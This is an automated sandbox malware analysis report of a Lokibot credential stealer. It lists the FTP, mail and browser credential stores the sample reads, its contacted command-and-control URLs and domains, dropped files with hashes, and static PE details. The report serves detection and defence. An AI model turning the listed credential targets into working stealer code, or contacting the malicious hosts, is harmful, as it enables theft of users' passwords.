Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: PopPassword
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Code function: SmtpPassword

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\aZOmps0Ug8.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 3980, type: MEMORYSTR
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aZOmps0Ug8.exe PID: 6780, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Obfuscated Files or Information2	Credentials in Registry2	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Software Packing2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery16	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion11	LSA Secrets	Security Software Discovery31	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Virtualization/Sandbox Evasion11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aZOmps0Ug8.exe	43%	Virustotal		Browse
aZOmps0Ug8.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.aZOmps0Ug8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
1.2.aZOmps0Ug8.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.aZOmps0Ug8.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.aZOmps0Ug8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.aZOmps0Ug8.exe.f030000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.aZOmps0Ug8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
74f26d34ffff049368a6cff8812f86ee.gq	13%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php	16%	Virustotal		Browse
http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php	100%	Avira URL Cloud	malware
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	true	true	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	aZOmps0Ug8.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	aZOmps0Ug8.exe	false		high
http://www.ibsensoftware.com/	aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown
http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA	aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.219.104	74f26d34ffff049368a6cff8812f86ee.gq	United States		13335	CLOUDFLARENETUS	true
104.21.62.32	unknown	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502657
Start date:	14.10.2021
Start time:	08:27:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	aZOmps0Ug8 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@81/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 80.6% (good quality ratio 76.4%) Quality average: 80.6% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 82% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe HTTP Packets have been reduced TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 95.100.216.89, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:28:20	API Interceptor	78x Sleep call for process: aZOmps0Ug8.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.219.104	Bank Details.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	QGBN7om1fc.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	11882.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Vgcx5Y4HKH.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	JtdPd3UkrM.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Notification.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	FOSaObIu24.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Payment Advice.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
104.21.62.32	Bank Details.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	QGBN7om1fc.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	11882.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Vgcx5Y4HKH.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	JtdPd3UkrM.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Notification.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	FOSaObIu24.exe	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
	Payment Advice.xlsx	Get hash	malicious	Browse	74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
74f26d34ffff049368a6cff8812f86ee.gq	Bank Details.xlsx	Get hash	malicious	Browse	172.67.219.104
	QGBN7om1fc.exe	Get hash	malicious	Browse	104.21.62.32
	11882.xlsx	Get hash	malicious	Browse	104.21.62.32
	Vgcx5Y4HKH.exe	Get hash	malicious	Browse	104.21.62.32
	JtdPd3UkrM.exe	Get hash	malicious	Browse	172.67.219.104
	Notification.xlsx	Get hash	malicious	Browse	104.21.62.32
	FOSaObIu24.exe	Get hash	malicious	Browse	172.67.219.104
	Payment Advice.xlsx	Get hash	malicious	Browse	104.21.62.32

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	k00FzM4fb3.exe	Get hash	malicious	Browse	104.21.26.237
	hQQe6WqUOP.exe	Get hash	malicious	Browse	162.159.133.233
	0JckmrUWzC.exe	Get hash	malicious	Browse	172.67.143.100
	8Yhzfjf0tx.exe	Get hash	malicious	Browse	172.67.168.153
	GR01DtRd0N.exe	Get hash	malicious	Browse	162.159.133.233
	TqSDHvsKpt.exe	Get hash	malicious	Browse	162.159.129.233
	Bank Details.xlsx	Get hash	malicious	Browse	104.21.62.32
	fYkew3tmy4.exe	Get hash	malicious	Browse	172.67.188.154
	Wellis Inquiry.exe	Get hash	malicious	Browse	104.21.2.218
	Halkbank,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Asperiores.exe	Get hash	malicious	Browse	172.67.177.45
	jew.arm7	Get hash	malicious	Browse	104.30.5.105
	Dbvisualizer-Licence_982671065.exe	Get hash	malicious	Browse	172.67.177.45
	EaZ0UhBdLE.exe	Get hash	malicious	Browse	104.21.26.237
	Purchase Order PO-1000837 from LAW TRANSPORT.html	Get hash	malicious	Browse	104.16.19.94
	hoho.arm7	Get hash	malicious	Browse	104.27.20.79
	hoho.x86	Get hash	malicious	Browse	172.70.21.0
	#Ud83d#Udcde-youse.guia-644-46204-282109.htm	Get hash	malicious	Browse	104.16.18.94
	tmDSSwkOAM	Get hash	malicious	Browse	172.68.102.160
	oIKRh1ruPM.exe	Get hash	malicious	Browse	162.159.130.233

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll	Bank Details.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\96w0bq54qhi02 Download File
Process:	C:\Users\user\Desktop\aZOmps0Ug8.exe
File Type:	data
Category:	dropped
Size (bytes):	217921
Entropy (8bit):	7.989316240408084
Encrypted:	false
SSDEEP:	6144:lURBaQUyhxMk5O9VK/zHl/hfjB9i4laUw+I:lYUyvMC/jXjrH3I
MD5:	D6B090A9F226F60E8C2514C17AC0ACAE
SHA1:	95852FEF4218FD1620E8AE8425A29332B1AA8403
SHA-256:	DF082B249FD67FDAF005CC9ED5C047DE2914995F41AB72CD35B18CF661AB27CC
SHA-512:	91DA3ED8442E03CEA52DEEC0C0266A19FBEC2EFD4475CCC05C5FD9A9212A8C715981F94BD17EB16EE0AD880785544E3A41AC56E195C6C03DEB3B433EEDE3FCC7
Malicious:	false
Reputation:	low
Preview:	..:.}w%.. .#.'..i5...O..m_..6.Hx.@/.w3+.b.....eWu.8.....?..m..M..".<qP....>+1............N"{a._(........iF\|./`t..#u....6.X.!/..p,....U).t..2{:...-.d61.........:..}W.R..1Ea_N.;c~...b..E..K..m2X...E.>^...#..5....... .AQ~..\|pl3...s!.........c...fwG.J..#...Y.......m_q.6....@/.w3..b....e.u.8........m.i...`..d..G+..O.Q>..d5.....n.s..]S.......GD..!.}...V..#u....6.....l\uwO.Lu!.k....ko&,p.W......8Iw`.....C.... ...)+..c..z...........,m...vz.(6...J....<;..lbJf...\|p.N..K.I.x.Bg....c...w%.. .#K......x.......m_..6..x.@..w3+.b.....eWu.8.{h......m)d..Q...:...x..O..>..d5.....O...]S........GD....#...l..#u....6.....l.uwO.Lu!.k....ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l.AQ~..\|p.:..KOI.x.g....c...w%.. .#....i5...&..m_..6.Hx.@/.w3+.b.....eWu.8........m.u.{`..d...+..O..>..d5.....O.s..]S........GD....#...V..#u....6.....l\uwO.Lu!.k....ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l

C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll Download File
Process:	C:\Users\user\Desktop\aZOmps0Ug8.exe
File Type:	PE32 executable (DLL) (native) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	6.386049451747606
Encrypted:	false
SSDEEP:	1536:wmFgGAZxpEuLPsu0NR7mNzUK2q8fIrzcYyKkRrIAHaqsWnvf3WklE9ncobUfsirl:FFgGAaus+eyvKjxlErGrz
MD5:	B5D0F9FBB3DF9A1A42B479FDD334417C
SHA1:	F0780DBAFBDB20235C97A28CC0AD8E1ABC1547F3
SHA-256:	0EAEC60342B2074DA968F010E592AD52C8B7DBFD72759B97F999F0EB88861136
SHA-512:	3BD39726FEB5B0B946E6B29C17A12BA044BF2D0E5374C217527542A6A6F09F65E3944007D0427936178E5C485BEDE8631CAA5738D0BE50AC291759FCDD4EC26F
Malicious:	false
Joe Sandbox View:	Filename: Bank Details.xlsx, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....mga...........!....."...~.......*..............................................................................<...M...........................................................................h]..H............................................text.... .......".................. ..`.rdata...V...@...X...&..............@..@.data....B.......$...~..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\Desktop\aZOmps0Ug8.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\aZOmps0Ug8.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	1.2701062923235522
Encrypted:	false
SSDEEP:	3:/l1PL3n:fPL3
MD5:	CD8FA61AD2906643348EEF98A988B873
SHA1:	0B10E2F323B5C73F3A6EA348633B62AE522DDF39
SHA-256:	49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
SHA-512:	1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.93701459995172
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aZOmps0Ug8.exe
File size:	283552
MD5:	70d177abc7455c709ae9710630b9ea49
SHA1:	4d81e55880a35c0157046560eca20b9f528838f4
SHA256:	b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
SHA512:	25fd5fa3de0e8bfb89695b3ce55dbeb059eaaaef4a8d9cd4e503f1ccda379cc0ba550354aee59445876c1ea1244d3d696ecfd7e964f3ce0f328a83f48c5ce24c
SSDEEP:	6144:wBlL/cVBMRm3NqjXSfxgGNoYnUC9jIVUp6Uxgo9+n1J8UA:CeVj9+XI/NoYxpWV4go9afA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x4030fb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FC0C4CD96E3h
push ebx
call 00007FC0C4CDC4C4h
cmp eax, ebx
je 00007FC0C4CD96D9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007FC0C4CDC440h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FC0C4CD96BDh
push 0000000Dh
call 00007FC0C4CDC498h
push 0000000Bh
call 00007FC0C4CDC491h
mov dword ptr [00423F44h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [00423FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041F4F0h
call dword ptr [0040715Ch]
push 0040915Ch
push 00423740h
call 00007FC0C4CDC0C4h
call dword ptr [0040710Ch]
mov ebp, 0042A000h
push eax
push ebp
call 00007FC0C4CDC0B2h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7418	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2d000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5aeb	0x5c00	False	0.665123980978	data	6.42230569414	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1196	0x1200	False	0.458984375	data	5.20291736659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1b038	0x600	False	0.432291666667	data	4.0475118296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x25000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2d000	0x9e0	0xa00	False	0.45625	data	4.50948350161	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2d190	0x2e8	data	English	United States
RT_DIALOG	0x2d478	0x100	data	English	United States
RT_DIALOG	0x2d578	0x11c	data	English	United States
RT_DIALOG	0x2d698	0x60	data	English	United States
RT_GROUP_ICON	0x2d6f8	0x14	data	English	United States
RT_MANIFEST	0x2d710	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
